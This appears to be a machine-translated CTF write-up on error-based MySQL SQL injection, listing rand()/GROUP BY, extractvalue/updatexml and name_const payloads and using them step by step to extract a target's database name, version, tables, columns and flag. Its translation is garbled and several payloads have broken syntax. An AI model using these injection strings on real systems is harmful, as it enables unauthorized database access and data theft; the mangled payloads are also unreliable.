SQL injection collation based on error Echo

Because of review, stopped for several days, today change mode did a bit about the error echo of the CTF topic, first attached title: here

Collated some of the online on the error Echo method, here do not bring the address, please Daniel forgive: P

　　0x00 about error Echo

In my own words, the SQL injection based on error Echo is the contradiction of the SQL statement to make the data is echoed to the page (of course, in the actual application can be echoed back on the page, the general site to avoid this situation, haha, if you can meet you will steal the music bar).

　　0X01 is used for error echo of SQL statements (the following function can be successful only under MySQL, other databases are subject to textual examination and will be supplemented when instances are available)

First: Errors based on Rand () and GROUP by

First look at the error report on the rand () function and the group by in MySQL, yes, we are going to use the group by part of RAND () returns duplicate key error bug.

RAND () in a WHERE clause are re-evaluated every time the where is executed.
You cannot use a column with RAND () values in an ORDER BY clause, because order by would evaluate the column multiple time S.

This bug will burst duplicate key, and then the data can be exploded: P

Formula: Username=admin ' and (select 1 from (SELECT COUNT (*), concat ((rand (0)), 0x23, (SQL statement of data you want to get) x from Information_schema.tables GROUP by X) a) and ' 1 ' = ' 1

The second type: XPath burst information

The main use of the Extractvalue () and updatexml () These 2 functions, since MySQL 5.1 provides built-in XML file parsing and functions, so this injection can only be used after the 5.1 version

View the SQL manual

Syntax: Extractvalue (xml_document, xpath_string);

The first parameter: Xml_document is a string format, the name of the XML Document object, the doc second argument: xpath_string (a string in XPath format), and if you do not know the XPath syntax, you can find the tutorial online.　　　　　　　　　　Function: Returns the string syntax containing the queried value from the target XML: Updatexml (xml_document, xpath_string, New_value);　　　　　　　　　　The first parameter: Xml_document is a string format, the name of the XML Document object, the doc second argument: xpath_string (a string in XPath format), and if you do not know the XPath syntax, you can find the tutorial online. The third parameter: the new_value,string format, which replaces the found eligible data: Changing the value of a node in a document that matches a condition it is now clear that we just need to not satisfy the xpath_string (XPath format), but because this side The method can only burst 32 bits, so it is possible to combine mid to use

Formula 1:username=admin ' and (Extractvalue (1, concat (0x7e (SQL statement you want to get Data)))) and ' 1 ' = ' 1 formula 2:username=admin ' an D (Updatexml (1, concat (SQL statement of data you want to get), 1)) and ' 1 ' = ' 1

The third: Repeating the explosion of information (for this method, I have a successful test on the local database, but for the following that does not have any effect, it is not carefully explained)

Code: Payload id=330&sid=19&cid=261+and+exists (select*from+ (Select*from (@ @vers ion,0) a+join+ (Select+name_const (@ @version, 0)) b) c)

　　 0x02 ApplicationsIt says so much, let's apply it, based on this topic first we'll burst out his database name results: R0866cplushua

username=admin ' and ( select 5468 from (SELECT COUNT (*), concat (Floor (rand (0), 0x23, (select Database ())) x fro M information_schema.tables Group by X) a) and ' 1 ' = ' 1

　　　　And then explode his database version results: 5.1.61-alibaba-rds-201404-log

username=admin ' and ( select 5468 from (SELECT COUNT (*), concat (Floor (rand (0), 0x23, (select Version ())) × from Information_schema.tables GROUP by X) a) and ' 1 ' = ' 1

And then he's going to explode his name. Result: Log motto user here needs a one-piece explosion

username=admin ' and ( select 5468 from (SELECT COUNT (*), concat (Floor (rand (0) *), 0x23, (select column_name from Information_schema.tables where Table_schema = ' R0866cplushua ' limit 0,1)) x from Information_schema.tables Group by X) and ' 1 ' = ' 1

　　　　And then explode his column name. Result: ID username motto (here I start with the user table but the data is not what we want, so change the motto, also need a piece of explosion)

username=admin ' and ( select 5468 from (SELECT COUNT (*), concat (Floor (rand (0) *), 0x23, (select column_name from Information_schema.columns where table_name= ' motto ' and Table_schema = ' R0866cplushua ' limit 0,1) x from Information_ Schema.tables GROUP by X) a) and ' 1 ' = ' 1

　　　　Finally, it's the data. Result: key#notfound!# (I used XPath burst data here because I didn't know what was the first way to get out of it)

username=admin%27%20and%20 (Extractvalue (1,%20concat (0x7e, Select%20concat (Username,0x3a,motto)%20FROM% 20motto%20limit%203,1

)))%20and%20%271%27=%271

By the way, the problem is made. Since the Lord has just learned the above if there is anything wrong, please pass by Daniel to correct the thank you, but also hope that Daniel can share some other methods of injection and error.

SQL injection collation based on error Echo